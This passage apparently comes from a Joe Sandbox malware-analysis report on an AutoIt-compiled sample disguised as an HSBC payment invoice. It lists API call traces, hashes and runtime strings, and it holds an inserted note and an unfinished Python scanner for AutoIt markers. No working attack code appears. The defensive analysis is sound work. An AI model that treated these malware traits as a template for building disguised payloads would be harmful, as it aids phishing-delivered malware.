                      • Part of subcall function 00F0B8EF: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00F47F20,00F47F64), ref: 00F0B93C
                      • Part of subcall function 00F0B8EF: CloseHandle.KERNEL32 ref: 00F0B94E
                    Similarity
                    • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                    • String ID:
                    • API String ID: 2364484715-0
                    APIs
                      • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                    • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?,?,00E81AEE,?,?,?), ref: 00E816AB
                    Similarity
                    • API ID: DialogLongNtdllProc_Window
                    • String ID:
                    • API String ID: 2065330234-0
                    APIs
                    • NtdllDialogWndProc_W.NTDLL ref: 00F0CBA4
                    Similarity
                    • API ID: DialogNtdllProc_
                    • String ID:
                    • API String ID: 3239928679-0
                    APIs
                    • NtdllDialogWndProc_W.NTDLL ref: 00F0CB75
                    Similarity
                    • API ID: DialogNtdllProc_
                    • String ID:
                    • API String ID: 3239928679-0
                    APIs
                      • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                      • Part of subcall function 00E8201B: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00E820D3
                      • Part of subcall function 00E8201B: KillTimer.USER32(-00000001,?,?,?,?,00E816CB,00000000,?,?,00E81AE2,?,?), ref: 00E8216E
                    • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,00E81AE2,?,?), ref: 00E816D4
                    Similarity
                    • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                    • String ID:
                    • API String ID: 2797419724-0
                    • Opcode ID: 2712284b873b8c909728df3b74002537a18ffb18a4a65ab6c62eb5d1917fefa3
                    • Instruction ID: fd1d1bde70cd02b0948d7165296ee004352640cbee38d21789279e092deabaa1
                    • Opcode Fuzzy Hash: 2712284b873b8c909728df3b74002537a18ffb18a4a65ab6c62eb5d1917fefa3
                    • Instruction Fuzzy Hash: BFD0127014030877DA207B50DC17F593E5D9B18B50F408025BB0C791D3DA716810B659
                    APIs
                    • GetUserNameW.ADVAPI32(?,?), ref: 00EC2242
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: NameUser
                    • String ID:
                    • API String ID: 2645101109-0
                    • Opcode ID: fec7ee42e30ead8fb162776788fbc67843d6410fce854e8c90220a4130907b48
                    • Instruction ID: 1a02be1c6492fbf84946b86345d5c17a681eb3db61d674938289bbc0ebe52abf
                    • Opcode Fuzzy Hash: fec7ee42e30ead8fb162776788fbc67843d6410fce854e8c90220a4130907b48
                    • Instruction Fuzzy Hash: 4EC04CF1C0010DDBDB15DB90DA88DEE77BCBB04304F104095A101F2101D7749B449E71
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00EAA36A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: 9049c267a3f59ac13cdd432e0023365f5d0143dcb05dd8dd2a239fcef29a05d2
                    • Instruction ID: 1b65b4396e43052bb5ec679ea188db4630657b7a8d374d12ba6ee0f16eb7529c
                    • Opcode Fuzzy Hash: 9049c267a3f59ac13cdd432e0023365f5d0143dcb05dd8dd2a239fcef29a05d2
                    • Instruction Fuzzy Hash: 18A0113000820CABCA002B82EC08888BFACEA002A0B008020F80C808228B32A820AA80
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 12dbe763a02e87719b89e4dc79616e21f37d49d8f30c6f0941bacd7c39902ffe
                    • Instruction ID: 75cddf3d90130fbde8357d2cd4c7ecd4cd8155fdb4f6f0cf5be2eb99c1d12a52
                    • Opcode Fuzzy Hash: 12dbe763a02e87719b89e4dc79616e21f37d49d8f30c6f0941bacd7c39902ffe
                    • Instruction Fuzzy Hash: 08222A31505615CBDF388F24C6946BDB7A1EB03308F68646BD852BB3A1EB34DD82DB61
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                    • Instruction ID: b6569bf24f4fb32519d62c68f195598c27664ac7b0d39e6ea65735f2cb9dd880
                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                    • Instruction Fuzzy Hash: 78C180362050A30ADB6D463D943403EBEE15EA77B531A279DE4B2FF5C4EF20E524E620
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                    • Instruction ID: 0a498e998ab5fbc64516cf93272ba7534e9069f07b333da2adbf6c8dbf396e69
                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                    • Instruction Fuzzy Hash: 77C182362051A30ADB6D463D843403EBEE15EA77B531A27ADE4B2FF5D4EF20E5249620
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                    • Instruction ID: 1c1214552a72de12ce12e84b70acbac49362d2217005addbc164062bb7396afe
                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                    • Instruction Fuzzy Hash: 99C192363051A30DDB6D4639843403EBEE15EA77B671A27EDE4B2EF5C4EF20E5249610
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272013729.0000000000E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e20000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                    • Instruction ID: a57a883ba2e44c2fb167e4d02e7a48f239b9880a13efd84d68321ff758baa9d0
                    • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                    • Instruction Fuzzy Hash: D341D571D1051CEBCF48CFADC991AEEBBF1AF88201F548299D516AB345D734AB41DB40
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272013729.0000000000E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e20000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                    • Instruction ID: 65bf43915d732206d9ff0c2a4eaeb8f7cbcf8507161562845083494f17d7d3bf
                    • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                    • Instruction Fuzzy Hash: A0018079A00109EFCB48DFA8D5909AEF7F5FB48310B208599E919A7701D735AE41DF80
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272013729.0000000000E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e20000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                    • Instruction ID: 4711897f55a1770bd74af2ff5711833a403252c9b8d86e32a7da2411b3924c50
                    • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                    • Instruction Fuzzy Hash: 0B018078A00109EFCB44DFA8D5909AEFBF5FB48310B208599E819A7701D734AE41DF80
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272013729.0000000000E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e20000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                    • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                    • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                    • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                    APIs
                    • CharUpperBuffW.USER32(?,?,00F0F910), ref: 00F038AF
                    • IsWindowVisible.USER32(?), ref: 00F038D3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: BuffCharUpperVisibleWindow
                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                    • API String ID: 4105515805-45149045
                    • Opcode ID: d23868cecb87ca643f1c8ca71d7917a0515be1ab29f8233be31c7c67255ac9b2
                    • Instruction ID: f3a289ba1d6da0b207771acb4217f9e722f03de8e974fd2d3a0923959db9ff68
                    • Opcode Fuzzy Hash: d23868cecb87ca643f1c8ca71d7917a0515be1ab29f8233be31c7c67255ac9b2
                    • Instruction Fuzzy Hash: 3DD1A4716043058BCB14EF10C891A6A77E9EF98354F159459F88A6B3E3CB31EE0BEB41
                    APIs
                    • SetTextColor.GDI32(?,00000000), ref: 00F0A89F
                    • GetSysColorBrush.USER32(0000000F), ref: 00F0A8D0
                    • GetSysColor.USER32(0000000F), ref: 00F0A8DC
                    • SetBkColor.GDI32(?,000000FF), ref: 00F0A8F6
                    • SelectObject.GDI32(?,?), ref: 00F0A905
                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00F0A930
                    • GetSysColor.USER32(00000010), ref: 00F0A938
                    • CreateSolidBrush.GDI32(00000000), ref: 00F0A93F
                    • FrameRect.USER32(?,?,00000000), ref: 00F0A94E
                    • DeleteObject.GDI32(00000000), ref: 00F0A955
                    • InflateRect.USER32(?,000000FE,000000FE), ref: 00F0A9A0
                    • FillRect.USER32(?,?,?), ref: 00F0A9D2
                    • GetWindowLongW.USER32(?,000000F0), ref: 00F0A9FD
                      • Part of subcall function 00F0AB60: GetSysColor.USER32(00000012), ref: 00F0AB99
                      • Part of subcall function 00F0AB60: SetTextColor.GDI32(?,?), ref: 00F0AB9D
                      • Part of subcall function 00F0AB60: GetSysColorBrush.USER32(0000000F), ref: 00F0ABB3
                      • Part of subcall function 00F0AB60: GetSysColor.USER32(0000000F), ref: 00F0ABBE
                      • Part of subcall function 00F0AB60: GetSysColor.USER32(00000011), ref: 00F0ABDB
                      • Part of subcall function 00F0AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F0ABE9
                      • Part of subcall function 00F0AB60: SelectObject.GDI32(?,00000000), ref: 00F0ABFA
                      • Part of subcall function 00F0AB60: SetBkColor.GDI32(?,00000000), ref: 00F0AC03
                      • Part of subcall function 00F0AB60: SelectObject.GDI32(?,?), ref: 00F0AC10
                      • Part of subcall function 00F0AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 00F0AC2F
                      • Part of subcall function 00F0AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F0AC46
                      • Part of subcall function 00F0AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 00F0AC5B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                    • String ID:
                    • API String ID: 4124339563-0
                    • Opcode ID: 7efb4b3424d194170e2a7bbec72fc42dfd3065d2112f45019a77a98b8c0f64c4
                    • Instruction ID: e13158a6feaca2a82b6838d4095c51cc8e6cccb75c8989b19eb12c7251c7ad0f
                    • Opcode Fuzzy Hash: 7efb4b3424d194170e2a7bbec72fc42dfd3065d2112f45019a77a98b8c0f64c4
                    • Instruction Fuzzy Hash: 91A19C72508305EFD7209F64DC08A6BBBA9FF89331F144A29F962D61E0D735D848EB52
                    APIs
                    • DestroyWindow.USER32(00000000), ref: 00EF77F1
                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00EF78B0
                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00EF78EE
                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00EF7900
                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00EF7946
                    • GetClientRect.USER32(00000000,?), ref: 00EF7952
                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00EF7996
                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00EF79A5
                    • GetStockObject.GDI32(00000011), ref: 00EF79B5
                    • SelectObject.GDI32(00000000,00000000), ref: 00EF79B9
                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00EF79C9
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EF79D2
                    • DeleteDC.GDI32(00000000), ref: 00EF79DB
                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00EF7A07
                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 00EF7A1E
                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00EF7A59
                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00EF7A6D
                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 00EF7A7E
                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00EF7AAE
                    • GetStockObject.GDI32(00000011), ref: 00EF7AB9
                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00EF7AC4
                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00EF7ACE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                    • API String ID: 2910397461-517079104
                    • Opcode ID: 825001881c8d196d33399b29b5417392b2eb42e0b284b568ca27fbeb27008a22
                    • Instruction ID: d44ac87204ec994e07373b72aadb0906a3459194818667b76febf9715cbd9e94
                    • Opcode Fuzzy Hash: 825001881c8d196d33399b29b5417392b2eb42e0b284b568ca27fbeb27008a22
                    • Instruction Fuzzy Hash: 02A15F75A40219BFEB14DBA4DC4AFAE7BB9EB49710F044114FA19E72E0C7B0AD04DB61
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 00EEAF89
                    • GetDriveTypeW.KERNEL32(?,00F0FAC0,?,\\.\,00F0F910), ref: 00EEB066
                    • SetErrorMode.KERNEL32(00000000,00F0FAC0,?,\\.\,00F0F910), ref: 00EEB1C4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ErrorMode$DriveType
                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                    • API String ID: 2907320926-4222207086
                    • Opcode ID: 1f335f339c1f0a24f0e57d0bc1948e95b4a4f91c265c8b90f8bd6ba4c975457a
                    • Instruction ID: 9abbc3f335ec2f3b01adc6429f19620ac5393185bb445900719cb2cedb303f4d
                    • Opcode Fuzzy Hash: 1f335f339c1f0a24f0e57d0bc1948e95b4a4f91c265c8b90f8bd6ba4c975457a
                    • Instruction Fuzzy Hash: 7951C13068138DEBCB14EB13C9E29BE73F0AB54365B246026E44AB7291D735ED41EB43
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: __wcsnicmp
                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                    • API String ID: 1038674560-86951937
                    • Opcode ID: f2a05ac2dfdc6125a3afa36c933f4435a0a581d1653567d81c1e89c53b81c5d9
                    • Instruction ID: c759e0256e06fb9216690c9864a0f20e3954eaaad4eddecac0ba95c75d29e679
                    • Opcode Fuzzy Hash: f2a05ac2dfdc6125a3afa36c933f4435a0a581d1653567d81c1e89c53b81c5d9
                    • Instruction Fuzzy Hash: 888145B1600215BBCB25BF60CD82FEF37A8AF16704F046025F94DBA1C2EB60EA51D791
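The block above is the strongest evidence in this section for the "compiled AutoIt script" verdict: a routine built on __wcsnicmp that matches the AutoIt source directives (#include, #requireadmin, #notrayicon, #pragma compile, #OnAutoItStartRegister), next to a function that creates a window titled "AutoIt v3". Those strings belong to the AutoIt interpreter stub, not to the script it carries, so they identify the wrapper rather than the payload. The following scanner is an added example, not part of the Joe Sandbox report or of any tool mentioned on it. It searches a file for the marker strings listed on this page in both ASCII and UTF-16LE (the runtime uses the W-suffixed Win32 APIs, so its strings are wide), plus the "AU3!EA06" resource magic of a compiled AutoIt v3 script, which is not on this page and is included as a well-known marker. The test buffers are constructed, not real samples.

```python
import re
from typing import Dict, List, Tuple

# Runtime strings the report lists for this sample: the "AutoIt v3" window title and the
# script directives matched by the __wcsnicmp routine. Searched as ASCII and as UTF-16LE
# (assumption: the strings are not further obfuscated in the binary being scanned).
REPORT_MARKERS = ["AutoIt v3", "#OnAutoItStartRegister", "#requireadmin", "#notrayicon", "#pragma compile"]
# Resource magic of a compiled AutoIt v3 script. Not on the report page; it is the usual marker
# that tells the interpreter stub where its embedded script starts.
SCRIPT_MAGIC = b"AU3!EA06"

def find_markers(data: bytes, markers: List[str] = REPORT_MARKERS) -> Dict[str, List[Tuple[int, str]]]:
    """Map each marker found in `data` to its (offset, encoding) occurrences."""
    hits: Dict[str, List[Tuple[int, str]]] = {}
    for marker in markers:
        for encoding in ("ascii", "utf-16-le"):
            needle = re.escape(marker.encode(encoding))
            for m in re.finditer(needle, data):
                hits.setdefault(marker, []).append((m.start(), encoding))
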